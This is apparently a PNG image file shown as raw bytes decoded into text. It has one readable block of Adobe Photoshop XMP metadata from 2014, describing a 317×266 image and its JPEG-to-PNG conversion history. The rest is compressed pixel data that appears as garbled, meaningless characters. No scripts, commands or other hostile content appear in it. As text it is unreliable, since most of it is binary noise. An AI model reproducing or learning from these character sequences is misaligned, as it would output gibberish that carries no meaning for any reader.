i��+�0�(�Of++�
�y�m�����#�s��l�Lѣ�R�PL/�+x[[x�H�HZ�3�f��#�|���P���ظxY��"�E�#�Sw.1]R�dxi��}�h˲��P�XRU�jy��R�ҥ�C+�W4�����n��Z�ca�dU�j��[V*�_�p�����F���WN_�|�ym���J����H��n��Y��J�jA�І�
���_mJ�t�zj��ʹ���5a5�[̶���6��z�]�V������&�ֿ�w{��;��켵+xWk�E}�n��ݏb���~ݸGwOŞ�{�{�E��jtolܯ���	mR6�H:p囀oڛ�w�pZ*�A�'ߦ|{�P������ߙ���Hy+�:�u�-�m�=���茣�^G���~�1�cu�5�W���(=�䂓�d���N?=ԙ�y�L��k]Q]�gCϞ?t�L�_�����]�p�"�b�%�K�=�=G~p��H�[o�e���W<�t�M�;����j��s��.]�y�����n&��%���v��w
�L�]z�x����������e�m�`�`��Y�	�����Ӈ��G�G�#F#���
��dΓ᧲���~V�y�s����K�X�����Ͽ�y��r﫩�:�#���y=���}���ǽ�(�@�P��cǧ�O�>�|��/���%ҟ3J�iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15        ">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:xmp="http://ns.adobe.com/xap/1.0/"
            xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"
            xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
            xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#"
            xmlns:dc="http://purl.org/dc/elements/1.1/"
            xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"
            xmlns:tiff="http://ns.adobe.com/tiff/1.0/"
            xmlns:exif="http://ns.adobe.com/exif/1.0/">
         <xmp:CreatorTool>Adobe Photoshop CC (Windows)</xmp:CreatorTool>
         <xmp:CreateDate>2014-09-10T12:23:42+04:00</xmp:CreateDate>
         <xmp:ModifyDate>2014-09-11T12:40:42+04:00</xmp:ModifyDate>
         <xmp:MetadataDate>2014-09-11T12:40:42+04:00</xmp:MetadataDate>
         <xmpMM:DocumentID>xmp.did:cbd06755-ebee-5b4e-9a58-e7f2741aa911</xmpMM:DocumentID>
         <xmpMM:InstanceID>xmp.iid:9dd8592c-8b59-754b-8d04-76bfc65fcefe</xmpMM:InstanceID>
         <xmpMM:OriginalDocumentID>F835D704AD8457116D51401F29CD822E</xmpMM:OriginalDocumentID>
         <xmpMM:History>
            <rdf:Seq>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:c398d5b2-f4a3-8143-943e-63e796593901</stEvt:instanceID>
                  <stEvt:when>2014-09-10T12:25+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>converted</stEvt:action>
                  <stEvt:parameters>from image/jpeg to application/vnd.adobe.photoshop</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>derived</stEvt:action>
                  <stEvt:parameters>converted from image/jpeg to application/vnd.adobe.photoshop</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:cbd06755-ebee-5b4e-9a58-e7f2741aa911</stEvt:instanceID>
                  <stEvt:when>2014-09-10T12:25+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:0d1f9ca8-735f-6940-8a4b-3d2b0141ee78</stEvt:instanceID>
                  <stEvt:when>2014-09-10T12:26:54+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>converted</stEvt:action>
                  <stEvt:parameters>from application/vnd.adobe.photoshop to image/jpeg</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>derived</stEvt:action>
                  <stEvt:parameters>converted from application/vnd.adobe.photoshop to image/jpeg</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:b422274d-dc7d-c849-a36d-757b81bfcc77</stEvt:instanceID>
                  <stEvt:when>2014-09-10T12:26:54+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:ae56a873-d4b5-134b-b607-495e3369b0f2</stEvt:instanceID>
                  <stEvt:when>2014-09-11T12:40:42+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>converted</stEvt:action>
                  <stEvt:parameters>from image/jpeg to image/png</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>derived</stEvt:action>
                  <stEvt:parameters>converted from image/jpeg to image/png</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:9dd8592c-8b59-754b-8d04-76bfc65fcefe</stEvt:instanceID>
                  <stEvt:when>2014-09-11T12:40:42+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
            </rdf:Seq>
         </xmpMM:History>
         <xmpMM:DerivedFrom rdf:parseType="Resource">
            <stRef:instanceID>xmp.iid:ae56a873-d4b5-134b-b607-495e3369b0f2</stRef:instanceID>
            <stRef:documentID>xmp.did:cbd06755-ebee-5b4e-9a58-e7f2741aa911</stRef:documentID>
            <stRef:originalDocumentID>F835D704AD8457116D51401F29CD822E</stRef:originalDocumentID>
         </xmpMM:DerivedFrom>
         <dc:format>image/png</dc:format>
         <photoshop:LegacyIPTCDigest>CDCFFA7DA8C7BE09057076AEAF05C34E</photoshop:LegacyIPTCDigest>
         <photoshop:ColorMode>3</photoshop:ColorMode>
         <photoshop:ICCProfile>sRGB IEC61966-2.1</photoshop:ICCProfile>
         <tiff:ImageWidth>317</tiff:ImageWidth>
         <tiff:ImageLength>266</tiff:ImageLength>
         <tiff:BitsPerSample>
            <rdf:Seq>
               <rdf:li>8</rdf:li>
               <rdf:li>8</rdf:li>
               <rdf:li>8</rdf:li>
            </rdf:Seq>
         </tiff:BitsPerSample>
         <tiff:PhotometricInterpretation>2</tiff:PhotometricInterpretation>
         <tiff:Orientation>1</tiff:Orientation>
         <tiff:SamplesPerPixel>3</tiff:SamplesPerPixel>
         <tiff:XResolution>720000/10000</tiff:XResolution>
         <tiff:YResolution>720000/10000</tiff:YResolution>
         <tiff:ResolutionUnit>2</tiff:ResolutionUnit>
         <exif:ExifVersion>0220</exif:ExifVersion>
         <exif:ColorSpace>1</exif:ColorSpace>
         <exif:PixelXDimension>317</exif:PixelXDimension>
         <exif:PixelYDimension>266</exif:PixelYDimension>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                            
<?xpacket end="w"?>�� cHRMz%������u0�`:�o�_�F��IDATx��y�%�Yދ��Z{��9�5WuWwWϭn�!!	>`��
�X�1��~||�k�s��>����x�� c8 aa�dIhDS�z���k���r�=F���k��ؑ;��Q���v�#bŷ����}�K�?c�#XB����c���<����y%�[kݿ�^/��k%N��M��������-b'��<v�Rл���j�敼o��z�^/��k%N,�_D�,����c����,o��x���/cI�`�EJ�1��\�3�z�7|�q�9���z=�T���V���v;�o��C��c��^Blz�+Qr�� �DJə3g8{�,J)>����+^NC��N��y�<n��/��1 �:�ٝ�GX�J`���Ԧ�)'4��tX�V���?~��$	O>�$w�}7sssh��씷;�����W�v�m��
7�&�X���M���"�Tb��}�ޠ��z?���5������r�m��$	I�0??����k���y�<vߜG�,�+��Z���B��P�.#U!%�v�Z5���������i�[�{���!�V��>}�}������ŋy��V��iJ�6������y�]�{c�4�E��n����Cu�8c �D*bii�$a�������Ҷ\"�i��ÇI��'N����W��UVVVx��G���oؠ��v;�롵�XAcd���)��rUE���T*��n�����W"�_'MS�8���fcc���!<�'?�IN�8��w���h.�;c�#'�<v;�o|��v�Xk��xSD%)��H~���bs�Z�b���RjS#�F|,�_��v;��QT��T6��/�W��
�S~�N��5M���)ow;���
Rz�&F�V@�϶����_��S|�u���*@�����c�qM�PB^) ]��_N�+~�U �����,�����U�^��_��W.�u�o�
eg9�<v���wPp��R.C_�[��QA�-o�@�km\͉.?��j�����ZVn�a^�z|�Y_�}#���2�W�k�-�ʺ]�dл�j���__�^�_�[M�p'�6K�2��h�#;¥;�?돝5�Mz7�(���������fyy�z����0�VWW�V�

e��y��6�����8�N�C��fdd�(�X^^f}}�J�B�Vcxx�n�KEXk�v�4
�֤i����n���U��6CCCLLLdC�I�EJ����$I�׽^�$I�~V�TBd2Bqc�ɞ��bhhk-kkkH)i4W������ZT�����n�\A�9����uC�A������/�������9{�,��}���������K����y�����2<<��>�1��?�'�9s�������~�瘚��#��Ї���o��w��_��_���i4�r�-����糟�,���������/�"<����������?�K/��w�w��.������G����1::�}����O?M�Vc�޽<��C,..����[�Vv���g?�Y�^n����/��x׻��s�=���?O��dnn��������K<��H)y���έ��-�����
|E�l� �)@
_ƚ�0Jذ��\����7zyl�%�"�(�a�
U�O����Ї����=�y���|�s��R���)?�0���'�p�?��?�C=�O��O�ַ��o��o��_�2�]�ŝw��G?�Q>��2==͛�f��N�1���9{�,?��?��?�y._�������z�cx�'����?ȅ���{9z�(���\�x��|�+<x�}���}�(�8x� O=��v�^��|��{��w�^���X]]��(�J�[n���}�sDQĻ�.}�Q.]�đ#G8p����|�S��[n��ɓ'ٽ{w��~+dz��7(�X�����D�3�TXk�1-�o��J���z���;����qg�s��ǎ��jq��Q����g>Ñ#Gh�Z|��_����8p��o�
J)~��~���1���������Çy�Gx��'y�����0����������v�v��s�==z�_��_��h����<x0+3��6sss���q�]w���7��={�p��a�q>��s��	n��f�333H)��F�����$I8v����LNN"�dtt4����ڵ�׽�u�={���9n����S�fo�!�B)��N�� ��άi�d��.KTJ����)��ٽ�0��&Fn��݈`uu���U�����>���"dcc���O|����q������q�w �੧��s�����;���C���矧V��|�?��?emm������Moz�}�{Y]]�ҥK�{�<��c�~��LLL����q�T�UZ�CCC�t�MT�U��4�M���H�)%����j5n��6VVV2,���011A��@����f}}�|����,�
��ccc(����`׮]�j5���/����c?�c���}K�oVIW,o�%�R�N�C��fd|%%Z���qD�M�4?O�1���(��/��t�+�FǨ��g���3��!K�$��t���Z�V��v���1<<�]w����SSS��ͱ���#�<��7������O|�g�}������{��{�����R�u�]�����Cq����|�|���(�n��{��/����9r����<��Sh��g��!�dyy�N��������'���ns��j�Z_��l�g��^��糛U)E���ԩS��β���޽{9s�����r�-�����T*$I���RJn��f�?�5bfff^S*���Һ��Q#,\Z��E��y'㴛-� M��ב��)K�+��4�:t�
��	Lϙ�(!1R��!0F#�Bf����?���_W����HoTi����;�e4�S������v�/_��G�
ox###���1i��w����5N�>�w���/^�g�!I�1���K�j5~����g�R��B�����^�:��yVVVx�8s�_��8~�8���}/�;w���	��ǹp�sss\�|�(���ŋ\�|�������n��u���6������q��ŬS}���,�m4:t�Z����~9�4M�z�<L�
��,���6ϟ�����M1=�����muX\�蔤�c|r�ng�N
7>��=�����ՕU��.�T��l�,��j�H��!&&�H�&��˘T02>�p����E:�C##�����Y�+�a]�n����/I��6�Z-�z��~cc���u����V�َW��	��b�^#,km&�J�4MI��Z�FǴZ�L/,�@Q�m6���X�d+���P�ZK(k����W�[��ug���uS��'8{�,3{Ш)N�8��6�J����ބ��_z���i��;���sg�4���V�ѩ	:k�,�v�37���2�ӻ�"aii��]�DJ��Xc�զ^fcm���q���h��7�F�Zzэ��_x�Ο?Ϟ={2���0�V�^�G��`~~�4M��jlllE{���ҥK\�|�z��y��z���8RRJ���fnn���
VWW��W�VYYY�^�g^��w�fbbb��7Hdq71|�"~d�Z����Xk��	����j�j� -�V�鰡-���tp/i�E�ݤ��gb���f��eΟ9Am��F����c�#t{L7E����	����6[��LN�Gk
��\�h��CLN�c{��4ծi�g���-��_���S���t:Xk�T*�z=j�Zv��.7::���z�ξ}��������"�n���q��*RʌK466���Z�F�Vczz�ufd<55�e�B��}��A�]�۸]W�<���hcyo��j�;$��C��A�����ł��I��&��(%��5e����F��[�r��i�Tj���3;;�њ������b�FT���M z	.���Pm�8()��B�*I����O;�0�o�"5#���M=\L�Ԧ1��Y��`xxxS���j�M(�����|n���nP ��sQ��[˻!o��<)%FV�W�Jq�n������Q�JΞ8���iJ�Rai�󗖨T+ s�{�ƙ�,�I�^AŊ�{cX� �7�tz	C����k���p���aA�^#Iz+���
��c�o��U�m�n`�
f����ѵ�A��V���U^��ƨ�����B��X��#&'��*5�F�,/�����S���=Ac��P���i�GG�im�^���Q199����J�N{��Pctli
Fk�P����%��i��Fmd\����lWC��F�-�8�t�c�V���k1R��B(�H"�z�9���I�FII�UaI����8BX���1XKjSLb��*��$�D�lk2r�P�]6�U��aH����j��y��42�
A)��W�M���1JW:p�AuPYy�7��Ӳ�����7�5&��W{�$�i���K�kz�m?�0"kf`,I��j��\g����Y�I@(��H��Z����wRz:Ţ����X�E�&	���4m�_�����r��FI�
Z�i���vۥe~�f�W�MlW���m��V��
8�����x���~�݊�6�A��7ba�r�'����9w�^�渪�Rv\����a-�>���l[H�n�@�	�8~�h�L���0�o��s��j����-�-���||���]-H���T"pX���[�ĎV���W��
;Jd����>W.��������Bf�.��_g��3����%8[�J����z�^,,X�6)��6zMdzߴa��wI��W�3e�&��(�qGYj��HJ���Z�N\��N��c�����ۼ����L�=�慢k-�e|[̳� ��eP��W3�de������נhk�H���Ɲ��9w��
�ϗW��x\ �.�S�Z��|E�����ČB6�
�ϐ�@cQThr�<^�����z����ҖAϾ��e>Z�H����dŀ�e޼ٲ���0��	���5�p�+��6�F�ܯAK�0�6��<��œ���h�Mg�G(-��K�+����Ɇt�V�Z�G����-D��f��}���^[�Z�ZRM,UC���oհ'��2(��|o)��ذ��g��z�}v�A}�L'�'�����u��X�7�x���H,PZ�0�/�.�h��t��7�V��
ADpu���(��I����,��p��_��s9�
��#T��M`�����V�'�m*o���r@�۱��B!���@�e�J��P�g��0ic�ݯ��7��&�-���H��[��H�R2���z����v��j7�y!�E"`��.d?�P�b�X�!E�I���q�8,�͛�Ȼ�e�B�6���G	�V�{�Q]�&���<�(�7J�F���lPW�~׺���I���(��;���(�7h����K�p��4�y�ɷ��ck�E�?fa�?F[l �^%��F�Qn����o�@��&��oPW�)����?�����[8���)|���3ڎ��)\g��j���Y�B�c�
_�N緂�2>�����,�	i5�Z�2���
�=O�s�'�������$�����"���WaA
�V:\�t̢o�Xa��e�9��6[�a}�����c������W"}�J��
z�`b����z������t́�[�O�?ae�
��~�R�$�޳��S>��L׿kE� �2�1���pQ�ۭ�BD_��Kq`>60�!d{���C��nU��m�s��xj�G�G,�`���=(_�A�dL�p�ZO5��S8��>���0��k��F�����c���Z֝�J�XO�T��Z�>w�?�;gҿ��{=S�/��5���5֗��:�
ds��O����,��eϺ��2eY<����η[!Bؾ���A�O]5Y��}2���\&�����r�~n��
m���*J[��"�E
��P�:=�'@���)���-v%%	��!-������h�T���/���H!|�&|�(�쪉���lK��dڿφ�����!�
ݱ.���u7|k���ֺ�k}p�٭EƱsW"��������L�yN�M*���CVƶ|ZL��c-Q�N��@�Y�]9�@HUd���ͯahb!�������:"����A))d�=.�u?Ϯ�ߘ��7��±4-h����V�?c���8�p��b���w-lXX�a����
O�_;2/�$;�������B�1���,�:F119΅�Pq�N�m��K�,���h!�Z������]�/��|���"=`�D|ݽ�G�y���#�����~ɹ,�x��C�Y�p���:����qjq���d�U�[Rk��9��s,�.q�-ߎ=�/�#�`]P�֙�5��5Y������{�~ҵ�<���1�!��
k�TD�SZX*���#{oa��#\x�V��g�ZU���EL�
�}ZH�o���{ظx�8�dc�3/�Ŧ���G��>s3���QJm,�(b�p��X9v�S�?�Zj�7��uO�����p��قU�n�
n�Ag9TȎk�և8���9^��8}�4��292���Ϝ��6�aD*&�)��8�?�O�$��2}�}��w�y�I���'h�co����C�L잦y�Ek�[㳳�*$�.�&�����y���i_�H4��H���Ɍ�̟Ѡ

���峬_\�R����4o|��<��#P�;n%�v�.^�k}����ɡ���W���K�ԉ)�D���w��d�2��n�m�\�B/�ҋ'1�G�����[l\Xf�-�y�����ĭ�-��o��az���atd��c'�u���K��L�~+b�"g{���:�T�
_�W�u[|�����+>��?�;�_���˨�����c�1�g?6��#�A\z���_`�
w���_���gط�b�I/q�	�����l�K�=���*���6j��VC�s��g=t��=ϋ_}�8�,HaH��T��q�w}g>��.� 1�T�G���cS�>ȡ{o�£_��Lj=l��֒�
��m��7Ҽt���e��u����M�>|7m=L��a*�
��}�}�8Ǿ� ��	�ݕ5��m'���0�����y��\:}��x7�~x�H�6�#���2��q���3�m��w܉�����9��G|�)d���:��[�hqni�����I��'�xr�����N�D4qG��n���L��.?� kb�{��̌147ė����C��7����mws�;��8Yf��9�lQ������x�kv�LL��]�|�|�T���ޔ�=�=����>�vVNsӝ�X��{����<B�Z.�=��eR���H�_(��)Fv���'?Au�f�}�mTv߆4uN~�T�$jx�����}��i�tv��'�g�In���Ow� �ר$M&a��*�QA�.�ܬ��n6��S�/`��ĥ+h���5im�C?����Y�/^��)��>DsE�~���җ�:1D��:��%c���^X��ͅ�tǦy�/�4_}���=���7���
��<�}�=�=+=x���_&YHY91�K��]
U�H�,4b���:1�����5R7}����:Iw�[���i�]�*�ģ�sa����>l�0>�{ނ�i�����(S�9��7�'>�h���]��w�&]c�����	�����,�>�ɏ�!)����-ۀ���mo}�N?���_���}��8��`�Q���~���d��y�{��v�q�2vx�3O<K���6Lk��������������?�c��=�63Jwy����Ls�F�ŧ�� G����^x��S�,_8�Bs�����X��O2>���X�������Y{�Y�Y߰�|�#z/�i�Z���J�N{�G�:�>�4+-&�&���L���v������>�WO��ۘenv���L���G�}L�
��l�w���}�v���E�C
jc
��Q&��ą��^4��?�ì�z���w�x�+-=��#G���>;��/|��g��
��x#�㏳q�<������hކ��a�jm
������/t����o��;���Lc�n����K k��O���34W{D�R�^8���=�B�Kmd�H*Tm�hbS�dq��o�N�?
�6�Z��qb��w��'8��1�%B�6_*I��idT!��@��jU���-����A�k�R'�e�u�����Ǝ�q�����ne���7G<ZG�.i�I\kP�'�Y��y����S9���`�&��~1˼y���y�?�0���ˤ�%������5�����ڙ�L>��ƴ���K���O2�2Sw��ѹ]Y�&4�����������5�y�ՇI�)q��H�\��'Y~����^���}�aR��fl�t�,<�(+W�N�ҽ|�x|����k����"���u�p��pC;���L�SL:M��я�t��-�~��8�}s<��/��s��n,�R�I�uz-Ù�nF��Ϝ�q� :��_D�͉O}���&6N���Ǟg��qE���qfǹ�����:���\x���:kO>���x�7�����./1u`~�n��ɱ)��t3K���N��?Iki�@C���Al���?��s�U+Ϝf�_c��۩Ȕ���/3~�ȴG��U�&���Y|�k|��_���y:����Y�x��w[��8�>�c��!��r/q{��?�)����0��V6^8A�\��m�[	����N���/�9q����tW8��IF�݂�	���G8��?�]���ߠ7ُ����`��I��~�To0ި���1��YF}����h�Y���Ǟctn�Y��/��d��!VN=���c��O�pWA�i��'���ڛ�����~��g����oF/�������瞻�����/�\��[j"�xae����*�Q��k�9�]>ñ����׽���e����2{�v�x��c��SB�����or�K��Z�G�*3ӈ�%���Gi�FY;�O�����O|��/�H�p?˧.8L�w����<�1��%E_� ���W��,D6?9!��+��͇��Z���j�J��$)B�S��X�(FJ/�� 8��'�Y`Ϳw*%�^G'=�nY���Dӑ�
���,���#�#:]l#ӄD(R��[�
Q��6��Dq����D�zD�5:Z²ac�ft�A�T:/Ԋ�t�!��Q>�R���GՆ(R�I�`��$BB�N['��&���{�%6��T!V�n�Qh�r7��D��
�hk���\��R�J"��]ǴZ�'@��{~��>�����p��ix��*�^2�k�h�~[�	A��a�BD"MP~=$V�∊54��ƾ��og�q�}�˨TS�ӻbA�xF���S�R�#z�6FT��2�KH��BW��Sz�	��"�J��*��U)��`XXߤI��J��Hztz=�Z
���^�X)��
�J���N^Hj�
��#Q��1�IB7�P�U1�6Fk�Z��N��R�k��J}7�U�o��l��k[n����V�
!)_�D�/Z�o��ʊ�!�/�m_͠xg �r>z�X��Q����[��u�r�nb�NTD�q%��i#tJ�)��M�K%K{E�l�Bj]A�B�.,c��a4�o%E�Bߡ�u�U��L�wq����>,�<5"K?\�
���p���*v�e���(�R��$Mz���Q�P�i�SN�d6��i���_;|
�Q�:ݵut/!^`X��0&��)|�"�3h�.��JvC�s��`ACZ ytv���&Rx����Y�^\5�aoP0Q���]���6�>�ȵ����E�ٍ��V�K��S�x5����7���Kd���zώ���h78	��4S^��C9�t�:���f�Q��)�%����rƻ�|	� ��U�T����E�¤��ǒ&�#Mvn����8gdj%ʯ�@�������*��͋2L�8����(�
7��,cQ����g���f�������'Jk��\���t%����"�)�0Q��B�(�gH�֟�0�'l��ȿ��w*��U'
��?>!�
�y�%� o�lR�v�Z.�
��p�i�0�j�����R�F���F=��z���+1.nm�~��:��:�#���L�H��\�����?o\�7@l��a#4j<��R�p�ó}�}j�6?rQ����3ف�9d"k~�$6�dD!�,�N�պ�<q�e����|�[ϧb��|S�b�ȓwW��T��-��ߣ��mu>b\9���E��������^��R��Ҝ���*7�J�k���y�٠dÔ�G1C5L�Z�l=��H�#z7vЋ�ܜ�g�W�F��nR�H"�p_�Ը�ڢ$)���p3��U�M3���Ur�
�j�������U������9�L�,�^	��fQKn��9��UJό��q޷�u��C��j�sU�L�4[��!�r=�;�u-��sm���5���`A��J���
���,���3��F_^��C��`%U�,�ưԕD�q�0_JR�ٶ3���2�T¸܄�j���Gʍ�P�m.�h�̦�=�Xؾ��]V �AZ����)�FTE�j�C��u
�ꤷm���� �g�!�o,O�&QfzSz�S%1�c���(����y?H�n>ّ���uB�/啟�
�����W�;����'���腬�o�v��-�����+)�/G+2�̰�@Y�.1���~$ָ��$�-*!�)K%r�a�5ƯO�e>&her���[��)�P����SX �tخ�DR���`��X��%�p�E�a�Z�3R�����?��d����@$�f��4���{�W+���d,zw��O��9�n���H:mA��ˀ�����7?��<���5lK?i�-�p���>�,7^	C�s)s���
*�Z���AMD�g��vX���r�>����̓��o,�X�J�����zs�ӷ��Q�}����S��x���7
�2Z�gKe9#2�l[�B10��7D;`���a�Qa��(
���<
����K��2����?���R��R�z\!
�c3�h�6_�Kk��������m)I1��T;,�!$Z�o�(���ސ������bQ�*�V{_��YK�^�8/k��ڲ�t9p�!���oX�,�Z���`Z���:�V�(~���P
F>
�U"Ϛ �,�DJ&���B�~�)Q�Py� -��|��}Fq%�<� 5�X���F�D2� ���rvW��2r)E���;Ƽa%�zKK�Mi��X�5�,tc3w���][��
�
F���ٯ�.�3�Z(�� ��2}k�FK�Ƨ�������� �)��L��e�&[c��.��C*H<���)cij@���jvM�P�%�=�0g�^B��s���iԆx�SH�Z
��I!	&uNh&ʛT�������4�}��ʔHR���N������iL��j
Zc�m�ȟS?tg4����a���y� ��-�^�l��87��ɍaJG�4�5�f�v�M��w�[�A���7C���U2#�J$RI_��M���5-�b�0I��*�	eP�r|���\�@g��E:�XldZ\.x�,@�n�Pth���C.���s�=y�R#�;JcL���4�N�t�|�7�B2+��
�Ub�&ZP4)�ٲyc*����j�"�Ƥ��7��(�`\vn}�}��7���(�>k�_YR+0V"��ُ �	SSS��&��?��|�c�5)��)�������p��y�Xݸ���+G�p޹��.+Z%?�p
mP���t�&��B�Z�J�0��c0Zc�ԟC����[��ή�M�B�y��R����L�v\��N�ۺ<�ְ�ϋ,�o�s�֛T:R�})��LG�\�޻�(�^k;KL?l�7�ϥ�%F�%#�����(b�6ǘD�5 �W�ký/B�MA�`��[���K�,J�++��]6%��C�r�P�5%�d
���w,9�����آ'(�,��E�
��ˋ4�F����IX[k�$D2�
Cj,(�6�����$�8�qȨ\��
ᮁM5C�
R
���=���
���IN�����/q�������<��1�$!�#�X�u"��^.�Mg��{J��nm��B��7�X�J��J�W)�]�h�1rس�(!IF(RFN�'������2�@w�޵1M6�4MQJ
L6�����B�cS�v#b��$�/��M��
��3(��J��r6�̃���l�>S���m*^��˘�1&� ��WE�1E�V�[ھ�67�α*k�F�-�[u�떧*�:����'�;���r�M���׽���Q.�v�%	�r%�Sj����D�}.�Ɓ�җwƺ,:�"���y�_�C���841���4q}��.�Z�V�͇~���p���K���n��'�z���2���(k1)�J�2;��8BJ�EZ�oNyE�>�:k��)��쾑җ�6�֮�m{.W^Y0$�Z��/l�F�Ɲ�a���R�2��ey��W���v�g9��;+-J����hcЩ��mK���/W`���
�Q���L��-ŗӃώ�C{�xLN�LA9o,�|��ni��]iq���4�9pϽLO��Տ��k���K��3V#�E���75�$ޣz"M>�岙B��s��F����?Dw�$��7����p-"M�T�cc#LM���׾����)cv��`!B��D!B!�D�@\���jA$���-k}�6`c�>�ο�_;RI����m����:т���}U�kD��
z�~o)`��WF[�$v�i��^oP�vzc����[~ſ�Z���ߦ�w���]��.�@��kn��=��3�����v�{�^�6���k@/� �hKC�;��}?���_��Z������d�Q�^��v�޼�4�4�����`�B�zR�<�Kg��mo��]�gٵ��n�"Pm�Z���|����vO��i�!�=2�H��6l�t���D��R���Y\�Jm���f螯��BF����~y#�C;��OX�!S��7��J�D�o�+�����V���%n�eW�#�hO+.)rL�1��zԬ�Y�%~9h_�粅����A�)Q���.�S;8×[Rg�xiWs^�?�Q7A�*c##�
E4�1<���ȏ����w�G�YYk��%V�)�}Y.�������!1V9qA�!Y<ϛナ�ί�IV{4�	�2D/�ȊB���(�����r��^���N�BǷN�����5#
\Ұ�ܐ_hh���B9>�Zg�F�G>�	$ƤN�OI��j��[��Z�����\b�q1�ϲm��]V5��A�F(c�et���b��3l
��S#�.�H�Vd��b7z��|� �i�zܶ�]�󫭧�ç�I�^�sۂ�I�n���)Vl]�J��jjJ0Z�9��c��?���C�r���9��s���|�K_�1\e��q���@X��6�	�9^�	�6���X)�TD�Ҥ}�J�8{���x�S,����"��V��U�4���*��b~�<��v9��p�7)}��w���DJ�F�D	�s����M����Q�og��s��fK�,Z߭��
'W[�����j�hAas����ׄr��X�V������Z�wt����+�.������E�"��v�•:���^>�.��1�ԱW��٦{���m��M��rKI
�\��e�u"��)H���ؔ�ioL$��E^6qe���
�����\<q�O��C,�O����H�.6j�+���S�<����ֻ����8������V�&�.6I1H� wf�H*���E�=�4Ik�^8�3gΑHIU)Y��v�$�B}�N��duy�=�b�F��AIJ���F�S�$�':��90��R�~[k��q���6[ǡ1��5JO�*��U(��ץ>���5˜L�u'�]ca��v�rIV.�&���x� �� �V��r�4L�a@�uJ��/W��S������n�.�f�6H��f�E,ە�9�.�����&
����G`d�8�a�(��12�p
��|���Hz-5o���ٿ��3/�̱�X��g��O�;��I��8r뽼�{��[��,{3`,�-���ԥD�iD拫�)I"��w�3;�Ed�S�-��ڤi:M�G+�jtM
